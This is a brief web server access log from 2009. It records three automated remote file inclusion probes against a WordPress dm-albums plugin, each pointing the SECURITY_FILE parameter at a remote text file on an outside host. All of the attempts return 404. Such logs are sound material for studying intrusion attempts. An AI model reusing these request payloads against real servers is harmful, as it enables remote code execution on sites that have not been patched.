206.225.23.4 - - [17/Jul/2009:03:04:03 -0400] "GET /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:03:04:03 -0400] "GET /logs/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:03:04:04 -0400] "GET /logs/access_log.Q109070200/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
